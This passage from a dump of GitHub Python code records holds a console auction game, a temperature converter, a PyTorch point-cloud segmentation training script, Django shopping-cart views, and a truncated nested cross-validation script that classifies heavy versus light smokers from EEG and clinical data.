+{"seq_id":"72270606913","text":"import os\n\n\nlogo = '''\n ___________\n \\ /\n )_______(\n |\"\"\"\"\"\"\"|_.-._,.---------.,_.-._\n | | | | | | ''-.\n | |_| |_ _| |_..-'\n |_______| '-' `'---------'` '-'\n )\"\"\"\"\"\"\"(\n /_________\\\\\n .-------------.\n /_______________\\\\\n'''\n\n\n\nbidLog={}\nflag= False\ndef getBid():\n name=input(\"Enter your name : \")\n bid=int(input(\"Enter your bid : $\"))\n bidLog[name]=bid\ndef getWinner(dict):\n bid=0\n name=\"\"\n for key in dict:\n if dict[key]>bid:\n name=key\n bid=dict[key]\n winner={}\n winner[name]=bid\n return winner\n\n\n\nwhile not flag:\n print(logo)\n getBid()\n choice=input(\"Are there any other bidders? Y: yes, N: no -> \").lower()\n if choice==\"n\":\n flag= True\n os.system('cls')\n\n\nwinner=getWinner(bidLog)\nfor key in winner:\n print(f\"The winner is {key} with a bid of ${winner[key]}.\")\n input()\n\n\n\n\n","repo_name":"shailparmar03/PythonProjects","sub_path":"secretAuction.py","file_name":"secretAuction.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24231505513","text":"temperatures = [10, -20, -289, 100]\n\ndef c_to_f(c):\n f = c* 9/5 + 32\n return float(f)\n\ndef writer(temps, fileName):\n with open(fileName, 'w') as fileToWrite:\n for t in temps:\n if t > -273.15:\n print(\"Writing result of convertion for temperature %s\" % (t))\n fileToWrite.write(str(c_to_f(t))+'\\n')\n else:\n print (\"Temperature %s is lower than allowed\" % (t))\n\nwriter(temperatures, 'fileToWrite.txt')\n\n\n\n\n\n#with open('fileToWrite', 'w') as fileToWrite:\n# fileToWrite.write('some text')\n# fileToWrite.close()\n","repo_name":"sdulebskiy/udemy_python_course","sub_path":"File Handling, Loops, Functions, and Conditionals/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71965184194","text":"import os\nos.environ[\"NCCL_IB_DISABLE\"] = '1'\nimport sys\n\nDIR_PATH = os.path.dirname(__file__)\nROOT_PATH = os.path.dirname(DIR_PATH)\nsys.path.insert(0, DIR_PATH)\nsys.path.insert(0, ROOT_PATH)\n\nimport time\nimport random\nimport numpy as np\nimport logging\nimport argparse\nimport shutil\n\nnp.set_printoptions(precision=4, linewidth=200)\n\nimport torch\nimport torch.backends.cudnn as cudnn\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.optim\nimport torch.utils.data\nimport torch.multiprocessing as mp\nimport torch.distributed as dist\nimport torch.optim.lr_scheduler as lr_scheduler\nfrom tensorboardX import SummaryWriter\n\nfrom util import config\nfrom util.s3dis import S3DIS\nfrom util.common_util import AverageMeter, intersectionAndUnionGPU, find_free_port\nfrom util.data_util import collate_fn\nfrom util import transform as t\nfrom util.logger import *\nfrom util.config import CfgNode\n\ndef _try_eval(s):\n try:\n s = eval(s)\n except:\n pass\n return s\n\ndef get_parser():\n parser = argparse.ArgumentParser(description='PyTorch Point Cloud Semantic Segmentation')\n parser.add_argument('--config', type=str, default='config/s3dis/s3dis_pointtransformer_repro.yaml', help='config file')\n parser.add_argument('--set', type=str, default=None, help='command line setting k-v tuples')\n parser.add_argument('opts', help='see config/s3dis/s3dis_pointtransformer_repro.yaml for all options', default=None, nargs=argparse.REMAINDER)\n args = parser.parse_args()\n assert args.config is not None\n cfg = config.load_cfg_from_cfg_file(args.config)\n if args.opts is not None:\n cfg = config.merge_cfg_from_list(cfg, args.opts)\n\n\n if args.set:\n for kv in args.set.split(';'):\n if kv.startswith('{') and kv.endswith('}'):\n kv = eval(kv)\n else:\n kv = dict([[i.strip() for i in t.split(':')] for t in kv.split(',')])\n kv = {_try_eval(k): _try_eval(v) for k, v in kv.items()}\n for k, v in kv.items():\n setattr(cfg, k, v)\n if not cfg.save_path:\n cfg_dir, cfg_yaml = args.config.split(os.sep)[-2:]\n cfg.save_path = os.path.join('results', cfg_dir, '.'.join(cfg_yaml.split('.')[:-1])) # results / s3dis / origin\n cfg = CfgNode(cfg, default='')\n\n print_dict(cfg, head='>>> ======== config ======== >>>')\n return cfg\n\n\ndef get_logger():\n logger_name = \"main-logger\"\n logger = logging.getLogger(logger_name)\n logger.setLevel(logging.INFO)\n handler = logging.StreamHandler()\n fmt = \"[%(asctime)s %(levelname)s %(filename)s line %(lineno)d %(process)d] %(message)s\"\n handler.setFormatter(logging.Formatter(fmt))\n logger.addHandler(handler)\n return logger\n\n\ndef worker_init_fn(worker_id):\n random.seed(args.manual_seed + worker_id)\n\n\ndef main_process():\n return not args.multiprocessing_distributed or (args.multiprocessing_distributed and args.rank % args.ngpus_per_node == 0)\n\n\ndef main():\n args = get_parser()\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = ','.join(str(x) for x in args.train_gpu)\n if 'debug' in args and args.debug:\n os.environ['CUDA_LAUNCH_BLOCKING'] = '1'\n\n if args.manual_seed is not None:\n random.seed(args.manual_seed)\n np.random.seed(args.manual_seed)\n torch.manual_seed(args.manual_seed)\n torch.cuda.manual_seed(args.manual_seed)\n torch.cuda.manual_seed_all(args.manual_seed)\n cudnn.benchmark = False\n cudnn.deterministic = True\n if args.dist_url == \"env://\" and args.world_size == -1:\n args.world_size = int(os.environ[\"WORLD_SIZE\"])\n args.distributed = args.world_size > 1 or args.multiprocessing_distributed\n args.ngpus_per_node = len(args.train_gpu)\n if len(args.train_gpu) == 1:\n args.sync_bn = False\n args.distributed = False\n args.multiprocessing_distributed = False\n\n if args.data_name == 's3dis':\n S3DIS(args, split='train', data_root=args.data_root, test_area=args.test_area)\n S3DIS(args, split='val', data_root=args.data_root, test_area=args.test_area)\n else:\n raise NotImplementedError()\n if args.multiprocessing_distributed:\n port = find_free_port()\n args.dist_url = f\"tcp://localhost:{port}\"\n args.world_size = args.ngpus_per_node * args.world_size\n mp.spawn(main_worker, nprocs=args.ngpus_per_node, args=(args.ngpus_per_node, args))\n else:\n main_worker(args.train_gpu, args.ngpus_per_node, args)\n\n\ndef main_worker(gpu, ngpus_per_node, argss):\n \"\"\" per-gpu worker\n \"\"\"\n global args, best_iou\n args, best_iou = argss, 0\n if args.distributed:\n if args.dist_url == \"env://\" and args.rank == -1:\n args.rank = int(os.environ[\"RANK\"])\n if args.multiprocessing_distributed:\n args.rank = args.rank * ngpus_per_node + gpu\n dist.init_process_group(backend=args.dist_backend, init_method=args.dist_url, world_size=args.world_size, rank=args.rank)\n\n if args.arch == 'pointtransformer_seg_repro':\n from model.pointtransformer_seg import pointtransformer_seg_repro as Model\n else:\n raise Exception('architecture not supported yet'.format(args.arch))\n model = Model(c=args.fea_dim, k=args.classes, config=args)\n if args.sync_bn:\n model = nn.SyncBatchNorm.convert_sync_batchnorm(model)\n from model.pointtransformer_seg import Loss\n criterion = Loss(config=args)\n # criterion = nn.CrossEntropyLoss(ignore_index=args.ignore_label).cuda()\n\n optimizer = torch.optim.SGD(model.parameters(), lr=args.base_lr, momentum=args.momentum, weight_decay=args.weight_decay)\n\n scheduler = args.scheduler if 'scheduler' in args and args.scheduler else CfgNode({'name': 'multistep', 'milestones': [0.6, 0.8], 'gamma': 0.1})\n if scheduler.name == 'multistep':\n gamma = scheduler.gamma if 'gamma' in scheduler else 0.1\n milestones = scheduler.milestones if 'milestones' in scheduler else [0.6, 0.8]\n assert all([0 < s and s < 1 for s in milestones]), f'invalid milestones ( <0 or >1 ) - {milestones}'\n scheduler = lr_scheduler.MultiStepLR(optimizer, milestones=[int(args.epochs * s) for s in milestones], gamma=gamma)\n elif scheduler.name == 'step':\n scheduler = lr_scheduler.StepLR(optimizer, **{k: v for k, v in scheduler.items() if k != 'name'})\n else:\n raise ValueError(f'not support scheduler = {scheduler.name} : \\n{scheduler}')\n\n if main_process():\n global logger, writer\n logger = get_logger()\n writer = SummaryWriter(args.save_path)\n logger.info(args)\n logger.info(\"=> creating model ...\")\n logger.info(\"Classes: {}\".format(args.classes))\n logger.info(model)\n logger.info(criterion)\n if args.distributed:\n torch.cuda.set_device(gpu)\n args.batch_size = int(args.batch_size / ngpus_per_node)\n args.batch_size_val = int(args.batch_size_val / ngpus_per_node)\n args.workers = args.workers\n model = torch.nn.parallel.DistributedDataParallel(\n model.cuda(),\n device_ids=[gpu],\n find_unused_parameters=True if \"transformer\" in args.arch else False\n )\n else:\n model = torch.nn.DataParallel(model.cuda())\n\n if args.distributed and sum(p.numel() for p in criterion.parameters() if p.requires_grad):\n criterion = torch.nn.parallel.DistributedDataParallel(\n criterion.cuda(),\n device_ids=[gpu],\n find_unused_parameters=True if \"transformer\" in args.arch else False\n )\n else:\n criterion = criterion.cuda()\n\n if args.weight:\n if os.path.isfile(args.weight):\n if main_process():\n logger.info(\"=> loading weight '{}'\".format(args.weight))\n checkpoint = torch.load(args.weight)\n model.load_state_dict(checkpoint['state_dict'])\n if main_process():\n logger.info(\"=> loaded weight '{}'\".format(args.weight))\n else:\n logger.info(\"=> no weight found at '{}'\".format(args.weight))\n\n if args.resume:\n if os.path.isfile(args.resume):\n if main_process():\n logger.info(\"=> loading checkpoint '{}'\".format(args.resume))\n checkpoint = torch.load(args.resume, map_location=lambda storage, loc: storage.cuda())\n args.start_epoch = checkpoint['epoch']\n model.load_state_dict(checkpoint['state_dict'], strict=True)\n optimizer.load_state_dict(checkpoint['optimizer'])\n scheduler.load_state_dict(checkpoint['scheduler'])\n #best_iou = 40.0\n best_iou = checkpoint['best_iou']\n if main_process():\n logger.info(\"=> loaded checkpoint '{}' (epoch {})\".format(args.resume, checkpoint['epoch']))\n else:\n if main_process():\n logger.info(\"=> no checkpoint found at '{}'\".format(args.resume))\n\n # Create dataset (local to worker)\n train_transform = t.Compose([\n t.RandomScale([0.9, 1.1]), # rescale\n t.ChromaticAutoContrast(), # more contrast in rgb\n t.ChromaticTranslation(), # add random noise on rgb\n t.ChromaticJitter(), # jitter on rgb\n t.HueSaturationTranslation(), # aug on hue & saturation\n ])\n train_data = S3DIS(args, split='train', data_root=args.data_root, test_area=args.test_area, voxel_size=args.voxel_size, voxel_max=args.voxel_max, transform=train_transform, shuffle_index=True, loop=args.loop)\n if main_process():\n logger.info(\"train_data samples: '{}'\".format(len(train_data)))\n if args.distributed:\n train_sampler = torch.utils.data.distributed.DistributedSampler(train_data)\n else:\n train_sampler = None\n train_loader = torch.utils.data.DataLoader(train_data, batch_size=args.batch_size, shuffle=(train_sampler is None), num_workers=args.workers, pin_memory=True, sampler=train_sampler, drop_last=True, collate_fn=train_data.collate_fn)\n\n val_loader = None\n if args.evaluate:\n val_transform = None\n val_data = S3DIS(args, split='val', data_root=args.data_root, test_area=args.test_area, voxel_size=args.voxel_size, voxel_max=800000, transform=val_transform)\n if args.distributed:\n val_sampler = torch.utils.data.distributed.DistributedSampler(val_data)\n else:\n val_sampler = None\n val_loader = torch.utils.data.DataLoader(val_data, batch_size=args.batch_size_val, shuffle=False, num_workers=args.workers, pin_memory=True, sampler=val_sampler, collate_fn=val_data.collate_fn)\n\n # Train\n if main_process():\n train_time = time.time()\n for epoch in range(args.start_epoch, args.epochs):\n if args.distributed:\n train_sampler.set_epoch(epoch)\n if main_process():\n print(f'****EPOCH {epoch+1}****\\nlearning rate = {scheduler.get_last_lr()}', flush=True)\n loss_train, mIoU_train, mAcc_train, allAcc_train = train(train_loader, model, criterion, optimizer, epoch)\n scheduler.step()\n epoch_log = epoch + 1\n if main_process():\n writer.add_scalar('loss_train', loss_train.sum(), epoch_log)\n for i, v in enumerate(loss_train):\n writer.add_scalar(f'loss_train_{i}', v, epoch_log)\n writer.add_scalar('mIoU_train', mIoU_train, epoch_log)\n writer.add_scalar('mAcc_train', mAcc_train, epoch_log)\n writer.add_scalar('allAcc_train', allAcc_train, epoch_log)\n\n is_best = False\n if args.evaluate and (epoch_log % args.eval_freq == 0):\n if args.data_name == 'shapenet':\n raise NotImplementedError()\n else:\n loss_val, mIoU_val, mAcc_val, allAcc_val = validate(val_loader, model, criterion)\n\n if main_process():\n writer.add_scalar('loss_val', loss_val.sum(), epoch_log)\n for i, v in enumerate(loss_val):\n writer.add_scalar(f'loss_val_{i}', v, epoch_log)\n writer.add_scalar('mIoU_val', mIoU_val, epoch_log)\n writer.add_scalar('mAcc_val', mAcc_val, epoch_log)\n writer.add_scalar('allAcc_val', allAcc_val, epoch_log)\n is_best = mIoU_val > best_iou\n best_iou = max(best_iou, mIoU_val)\n\n if (epoch_log % args.save_freq == 0) and main_process():\n filename = args.save_path + '/model/model_last.pth'\n logger.info('Saving checkpoint to: ' + filename)\n torch.save({'epoch': epoch_log, 'state_dict': model.state_dict(), 'optimizer': optimizer.state_dict(),\n 'scheduler': scheduler.state_dict(), 'best_iou': best_iou, 'is_best': is_best}, filename)\n if is_best:\n logger.info('Best validation mIoU updated to: {:.4f}'.format(best_iou))\n shutil.copyfile(filename, args.save_path + '/model/model_best.pth')\n\n if main_process():\n writer.close()\n train_time = (time.time() - train_time) / 60 ** 2\n logger.info('==>Training done!\\nTime: %.2fh\\nBest Iou: %.3f' % (train_time, best_iou))\n\n\ndef train(train_loader, model, criterion, optimizer, epoch):\n batch_time = AverageMeter()\n data_time = AverageMeter()\n loss_meter = AverageMeter()\n intersection_meter = AverageMeter()\n union_meter = AverageMeter()\n target_meter = AverageMeter()\n\n model.train()\n end = time.time()\n max_iter = args.epochs * len(train_loader)\n for i, inputs in enumerate(train_loader): # coord (n, 3), feat (n, c), label (n), offset (b)\n data_time.update(time.time() - end)\n inputs = {k: v.cuda(non_blocking=True) for k, v in inputs.items()}\n target = inputs['point_labels']\n coord, feat, offset = inputs['points'], inputs['features'], inputs['offset']\n output, stage_list = model(inputs)\n if target.shape[-1] == 1:\n target = target[:, 0] # for cls\n loss = criterion(output, target, stage_list)\n optimizer.zero_grad()\n loss.sum().backward()\n optimizer.step()\n\n output = output.max(1)[1] # [BxN] - pred with argmax of logits (dim=1)\n n = coord.size(0)\n if args.multiprocessing_distributed:\n loss *= n\n count = target.new_tensor([n], dtype=torch.long)\n dist.all_reduce(loss), dist.all_reduce(count)\n n = count.item()\n loss /= n\n intersection, union, target = intersectionAndUnionGPU(output, target, args.classes, args.ignore_label)\n if args.multiprocessing_distributed:\n dist.all_reduce(intersection), dist.all_reduce(union), dist.all_reduce(target)\n intersection, union, target = intersection.cpu().numpy(), union.cpu().numpy(), target.cpu().numpy()\n intersection_meter.update(intersection), union_meter.update(union), target_meter.update(target)\n\n accuracy = sum(intersection_meter.val) / (sum(target_meter.val) + 1e-10)\n loss_meter.update(loss.detach().cpu().numpy(), n)\n batch_time.update(time.time() - end)\n end = time.time()\n\n # calculate remain time\n current_iter = epoch * len(train_loader) + i + 1\n remain_iter = max_iter - current_iter\n remain_time = remain_iter * batch_time.avg\n t_m, t_s = divmod(remain_time, 60)\n t_h, t_m = divmod(t_m, 60)\n remain_time = '{:02d}:{:02d}:{:02d}'.format(int(t_h), int(t_m), int(t_s))\n\n if (i + 1) % args.print_freq == 0 and main_process():\n logger.info('Epoch: [{}/{}][{}/{}] '\n 'Data {data_time.val:.3f} ({data_time.avg:.3f}) '\n 'Batch {batch_time.val:.3f} ({batch_time.avg:.3f}) '\n 'Remain {remain_time} '.format(epoch+1, args.epochs, i + 1, len(train_loader),\n batch_time=batch_time, data_time=data_time,\n remain_time=remain_time) + \\\n f'Loss {loss_meter.val} '\n f'Accuracy {accuracy:.4f}.')\n if main_process():\n loss_train_batch = loss_meter.val\n writer.add_scalar('loss_train_batch', loss_train_batch.sum(), current_iter)\n for i, v in enumerate(loss_train_batch):\n writer.add_scalar(f'loss_train_batch_{i}', v, current_iter)\n writer.add_scalar('mIoU_train_batch', np.mean(intersection / (union + 1e-10)), current_iter)\n writer.add_scalar('mAcc_train_batch', np.mean(intersection / (target + 1e-10)), current_iter)\n writer.add_scalar('allAcc_train_batch', accuracy, current_iter)\n\n iou_class = intersection_meter.sum / (union_meter.sum + 1e-10)\n accuracy_class = intersection_meter.sum / (target_meter.sum + 1e-10)\n mIoU = np.mean(iou_class)\n mAcc = np.mean(accuracy_class)\n allAcc = sum(intersection_meter.sum) / (sum(target_meter.sum) + 1e-10)\n if main_process():\n logger.info('Train result at epoch [{}/{}]: mIoU/mAcc/allAcc {:.4f}/{:.4f}/{:.4f}.'.format(epoch+1, args.epochs, mIoU, mAcc, allAcc))\n return loss_meter.avg, mIoU, mAcc, allAcc\n\n\ndef validate(val_loader, model, criterion):\n if main_process():\n logger.info('>>>>>>>>>>>>>>>> Start Evaluation >>>>>>>>>>>>>>>>')\n batch_time = AverageMeter()\n data_time = AverageMeter()\n loss_meter = AverageMeter()\n intersection_meter = AverageMeter()\n union_meter = AverageMeter()\n target_meter = AverageMeter()\n\n model.eval()\n end = time.time()\n for i, inputs in enumerate(val_loader):\n data_time.update(time.time() - end)\n inputs = {k: v.cuda(non_blocking=True) for k, v in inputs.items()}\n target = inputs['point_labels']\n coord, feat, offset = inputs['points'], inputs['features'], inputs['offset']\n if target.shape[-1] == 1:\n target = target[:, 0] # for cls\n with torch.no_grad():\n output, stage_list = model(inputs)\n loss = criterion(output, target, stage_list)\n\n output = output.max(1)[1]\n n = coord.size(0)\n if args.multiprocessing_distributed:\n loss *= n\n count = target.new_tensor([n], dtype=torch.long)\n dist.all_reduce(loss), dist.all_reduce(count)\n n = count.item()\n loss /= n\n\n intersection, union, target = intersectionAndUnionGPU(output, target, args.classes, args.ignore_label)\n if args.multiprocessing_distributed:\n dist.all_reduce(intersection), dist.all_reduce(union), dist.all_reduce(target)\n intersection, union, target = intersection.cpu().numpy(), union.cpu().numpy(), target.cpu().numpy()\n intersection_meter.update(intersection), union_meter.update(union), target_meter.update(target)\n\n accuracy = sum(intersection_meter.val) / (sum(target_meter.val) + 1e-10)\n loss_meter.update(loss.detach().cpu().numpy(), n)\n batch_time.update(time.time() - end)\n end = time.time()\n if (i + 1) % args.print_freq == 0 and main_process():\n logger.info('Test: [{}/{}] '\n 'Data {data_time.val:.3f} ({data_time.avg:.3f}) '\n 'Batch {batch_time.val:.3f} ({batch_time.avg:.3f}) '.format(i + 1, len(val_loader),\n data_time=data_time,\n batch_time=batch_time) + \\\n f'Loss {loss_meter.val} ({loss_meter.avg})'\n f'Accuracy {accuracy:.4f}.')\n\n iou_class = intersection_meter.sum / (union_meter.sum + 1e-10)\n accuracy_class = intersection_meter.sum / (target_meter.sum + 1e-10)\n mIoU = np.mean(iou_class)\n mAcc = np.mean(accuracy_class)\n allAcc = sum(intersection_meter.sum) / (sum(target_meter.sum) + 1e-10)\n\n if main_process():\n logger.info('Val result: mIoU/mAcc/allAcc {:.4f}/{:.4f}/{:.4f}.'.format(mIoU, mAcc, allAcc))\n for i in range(args.classes):\n logger.info('Class_{} Result: iou/accuracy {:.4f}/{:.4f}.'.format(i, iou_class[i], accuracy_class[i]))\n logger.info('<<<<<<<<<<<<<<<<< End Evaluation <<<<<<<<<<<<<<<<<')\n\n return loss_meter.avg, mIoU, mAcc, allAcc\n\n\nif __name__ == '__main__':\n import gc\n gc.collect()\n main()\n","repo_name":"LiyaoTang/contrastBoundary","sub_path":"pytorch/tool/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":20366,"program_lang":"python","lang":"en","doc_type":"code","stars":117,"dataset":"github-code","pt":"61"} +{"seq_id":"11700393312","text":"from django.shortcuts import render,redirect\nfrom django.views import View\nfrom .models import Product,Cart\nfrom django.db.models import Q\nfrom django.http import JsonResponse\nfrom django.views.generic import ListView,DetailView\n#def home(request):\n #return render(request, 'app/home.html')\n\nclass ProductView(ListView):\n model=Product\n fields=['id','title',' selling_price','discounted_price',\n 'description',' product_image',]\n template_name = 'app/home.html'\n success_url='/product-detail/'\n\nclass ProductDetailView(View):\n def get(self, request, pk):\n product = Product.objects.get(pk=pk)\n return render(request, 'app/productdetail.html',{'product':product})\n\ndef add_to_cart(request):\n user=request.user\n product_id = request.GET.get('prod_id')\n product = Product.objects.get(id=product_id)\n Cart(user=user, product=product).save()\n return redirect('/cart/')\n\n \ndef show_cart(request):\n if request.user.is_authenticated:\n user = request.user\n cart = Cart.objects.filter(user=user)\n amount= 0.0\n shipping_amount = 200\n totalamount = 0.0\n cart_prduct = [p for p in Cart.objects.all() if p.user == user]\n if cart_prduct:\n for p in cart_prduct:\n tempamount = (p.quantity * p.product.discounted_price)\n amount += tempamount\n totalamount = amount + shipping_amount\n return render(request, 'app/addtocart.html',{'carts':cart, \n 'totalamount':totalamount, 'amount':amount})\n else:\n return render(request, 'app/emptycart.html')\n\ndef plus_cart(request):\n if request.method == 'GET':\n prod_id =request.GET['prod_id']\n c = Cart.objects.get(Q(product=prod_id) & Q(user=request.user))\n c.quantity+=1\n c.save()\n amount= 0.0\n shipping_amount = 200\n totalamount = 0.0\n cart_prduct = [p for p in Cart.objects.all() if p.user \n == request. user]\n if cart_prduct:\n for p in cart_prduct:\n tempamount = (p.quantity * p.product.discounted_price)\n amount += tempamount\n \n data = {\n 'quantity': c.quantity,\n 'amount': amount,\n 'totalamount':amount + shipping_amount\n }\n return JsonResponse(data)\n \ndef minus_cart(request):\n if request.method == 'GET':\n prod_id =request.GET['prod_id']\n c = Cart.objects.get(Q(product=prod_id) & Q(user=request.user))\n c.quantity-=1\n c.save()\n amount= 0.0\n shipping_amount = 200\n totalamount = 0.0\n cart_prduct = [p for p in Cart.objects.all() if p.user \n == request. user]\n if cart_prduct:\n for p in cart_prduct:\n tempamount = (p.quantity * p.product.discounted_price)\n amount += tempamount\n \n data = {\n 'quantity': c.quantity,\n 'amount': amount,\n 'totalamount':amount + shipping_amount\n }\n return JsonResponse(data) \ndef remove_cart(request):\n if request.method == 'GET':\n prod_id =request.GET['prod_id']\n c = Cart.objects.get(Q(product=prod_id) & Q(user=request.user))\n \n c.delete()\n amount= 0.0\n shipping_amount = 200\n totalamount = 0.0\n cart_prduct = [p for p in Cart.objects.all() if p.user \n == request. user]\n if cart_prduct:\n for p in cart_prduct:\n tempamount = (p.quantity * p.product.discounted_price)\n amount += tempamount\n\n data = {\n 'amount': amount,\n 'totalamount': amount + shipping_amount\n }\n return JsonResponse(data) \n \n","repo_name":"Khuda-Bux/ecom1","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10205471536","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Oct 19 19:50:05 2022\n\n@author: pablo\n\"\"\"\n\n\n#SEED = 1000\n#model = XGBClassifier()\n#cv = RepeatedStratifiedKFold(n_splits=10, n_repeats=10, random_state=1)\n#pipeline = imbpipeline(steps = [['smote',SMOTETomek()],['classifier', model]])\n#score_nested = cross_validate(pipeline, X, y, cv=cv, scoring = 'accuracy', return_estimator =True)\n\n\n#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#\n# performs repeated nested cross validation by domain (eeg, neuropsych, clinical, socio-environmental) #\n# losely based on towardsdatascience.com/using-shap-with-cross-validation-d24af548fadc #\n#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#\n\n\nimport os\nimport pandas as pd\nimport numpy as np \nimport pickle\nimport shap\nfrom sklearn.compose import ColumnTransformer\nfrom sklearn.base import BaseEstimator,TransformerMixin\nfrom sklearn.preprocessing import FunctionTransformer\nfrom sklearn.pipeline import Pipeline, make_pipeline\nfrom sklearn.decomposition import PCA\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.preprocessing import RobustScaler\nfrom sklearn.feature_selection import VarianceThreshold\nfrom sklearn.feature_selection import SelectPercentile, chi2,SelectFdr,SelectFwe\nfrom sklearn.svm import SVC\nfrom sklearn.feature_selection import SelectFromModel\nfrom sklearn import tree\nimport xgboost \nfrom xgboost import XGBClassifier\nimport shap\nfrom imblearn.over_sampling import ADASYN, SVMSMOTE, BorderlineSMOTE,KMeansSMOTE\nfrom sklearn.metrics import precision_score, recall_score,f1_score, balanced_accuracy_score, auc\nfrom sklearn.ensemble import StackingClassifier, IsolationForest\nfrom sklearn.model_selection import RepeatedStratifiedKFold\nfrom sklearn.model_selection import RepeatedKFold\nfrom sklearn.model_selection import RandomizedSearchCV\nimport matplotlib.pylab as plt \nfrom sklearn.metrics import accuracy_score\nfrom imblearn.combine import SMOTETomek\nfrom imblearn.under_sampling import TomekLinks\nfrom sklearn.model_selection import RandomizedSearchCV, GridSearchCV, StratifiedKFold, train_test_split\nfrom sklearn.preprocessing import MinMaxScaler\nfrom imblearn.over_sampling import SMOTE\nfrom imblearn.pipeline import Pipeline as imbpipeline\nfrom sklearn.pipeline import Pipeline\nfrom numpy import mean\nfrom numpy import std\nfrom sklearn.metrics import accuracy_score, roc_auc_score, roc_curve\nfrom sklearn.metrics import classification_report\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler\nfrom sklearn.impute import KNNImputer\nfrom imblearn.under_sampling import RandomUnderSampler\nimport glob\n\n\n\ndef load_X():\n direc= \"./\"\n os.chdir(direc)\n X = pd.read_csv(glob.glob(\"*.csv\")[0],encoding=\"utf-8\", sep=\"\\t\", index_col=0).reset_index(drop=True)\n y = X.groups_hs_ls\n ## \"positive\" class\n y = y.replace({0:1,1:0})\n X = X.drop(X.filter(regex=\"group|ID\").columns.to_list(),axis=1)\n return X,y\n\n\nX,y = load_X()\n\neeg = X.filter(regex=r\"q_[A-Z]z(?=[\\w+])|Average\").columns.to_list()\nneuropsych = X.filter(regex=\"cpt|fwit|vlm|bls|bzt|vfl|mwt|zsn\").columns.to_list()\nclinical = X.filter(regex=r\"audit|adhd|psqi|PSQI|STAI|stai|tpq|fev|neo|rrs|rrd|haendig|bdi_|pss|BMI|psychiatrisch|soz_10|soz_11|soz_12|qsu|BDI|PSS|mean|pack|ftnd|onset\").columns.to_list()\nsocio_environmental = X.filter(regex=r\"vater|mutter|geschw|umfeld|familie|beruf|schule|soz_03|soz_04|soz_05|soz_06|soz_07|soz_08|soz_09|gender|^age\").columns.to_list()\n\nall_categories = [eeg, neuropsych, clinical, socio_environmental]\nall_categories_dict= ({\"EEG\":eeg, \"neuropsychological\":neuropsych, \"clinical\": clinical, \"sociodemographic-environmental\": socio_environmental})\n\n\nimport warnings \nwarnings.filterwarnings(\"ignore\")\n\nimport matplotlib\nmatplotlib.use('Agg')\n\n\nfrom imblearn import FunctionSampler\nfrom imblearn.pipeline import make_pipeline\n\ndef outlier_rejection(X, y):\n \"\"\"This will be our function used to resample our dataset.\"\"\"\n model = IsolationForest(max_samples=1, contamination=\"auto\", random_state=1510)\n model.fit(X)\n y_pred = model.predict(X)\n return X[y_pred == 1], y[y_pred == 1]\n\nreject_sampler = FunctionSampler(func=outlier_rejection)\n\n\n\nimport sys\nimport builtins\nimport os\n\nfn = \"fnlog.txt\"\nsys.stdout = open(fn, \"w\", buffering=1)\ndef print(text):\n builtins.print(text)\n os.fsync(sys.stdout)\n \n \n \n\n### iterate over categories \n\nfor key, value in all_categories_dict.items():\n\n print(key)\n X,y = load_X()\n X = X[value]\n \n\n # Reproducibility\n np.random.seed(1) \n\n # repetitions \n N_CV_REPEATS = 5\n\n\n from datetime import datetime\n start_time = datetime.now()\n\n import time\n timestr = time.strftime(\"%Y-%m-%d-%H-%M-%S\")\n fname = \"nestedCV_\"+str(N_CV_REPEATS)+\"_repeats_\"+timestr+\"___\"+key\n directory = \"./per_domain/{}_{}\".format(key,timestr)\n if not os.path.exists(directory):\n os.makedirs(directory)\n else: os.chdir(directory)\n\n\n\n\n # Make a list of random integers between 0 and 10000 of length = N_CV_repeats to act as different data splits\n random_states = np.random.randint(10000, size=N_CV_REPEATS) \n\n ######## Use a dict to track the SHAP values of each observation per CV repitition \n shap_values_per_cv = dict()\n for sample in X.index:\n ## Create keys for each sample\n shap_values_per_cv[sample] = {} \n ## Then, keys for each CV fold within each sample\n for CV_repeat in range(N_CV_REPEATS):\n shap_values_per_cv[sample][CV_repeat] = {}\n\n\n\n SEED = 1510\n count = 0\n\n labels=['Heavy Smokers','Light Smokers']\n\n import matplotlib.pyplot as plt\n import numpy as np\n # save // plot stuff\n fig, ax = plt.subplots()\n outer_results, conf_matrix_list_of_arrays, tprs, aucs, results = [],[],[],[],[]\n base_fpr = np.linspace(0, 1, 101)\n mean_fpr = np.linspace(0, 1, 100)\n\n\n\n for i, CV_repeat in enumerate(range(N_CV_REPEATS)): \n\n #Establish CV scheme\n CV = StratifiedKFold(n_splits=10, shuffle=True, random_state=random_states[i]) \n print(\"fold {} and repeat {}\".format(i,CV_repeat))\n \n\n ix_training, ix_test = [], []\n # Loop through each fold and append the training & test indices to the empty lists above\n for fold in CV.split(X,y):\n ix_training.append(fold[0]), ix_test.append(fold[1])\n \n ## Loop through each outer fold and extract SHAP values \n for i, (train_outer_ix, test_outer_ix) in enumerate(zip(ix_training, ix_test)): \n #Verbose\n print('Fold Number:{}'.format(i))\n X_train, X_test = X.iloc[train_outer_ix, :], X.iloc[test_outer_ix, :]\n y_train, y_test = y.iloc[train_outer_ix], y.iloc[test_outer_ix]\n\n \n ## Establish inner CV for parameter optimization\n cv_inner = StratifiedKFold(n_splits=5, shuffle=True, random_state=1510)\n\n pipeline = imbpipeline(steps = [\n ['imputer',SimpleImputer(strategy=\"most_frequent\")],\n ['smote',SMOTETomek()],\n ['outlier',reject_sampler],\n ['scaler', 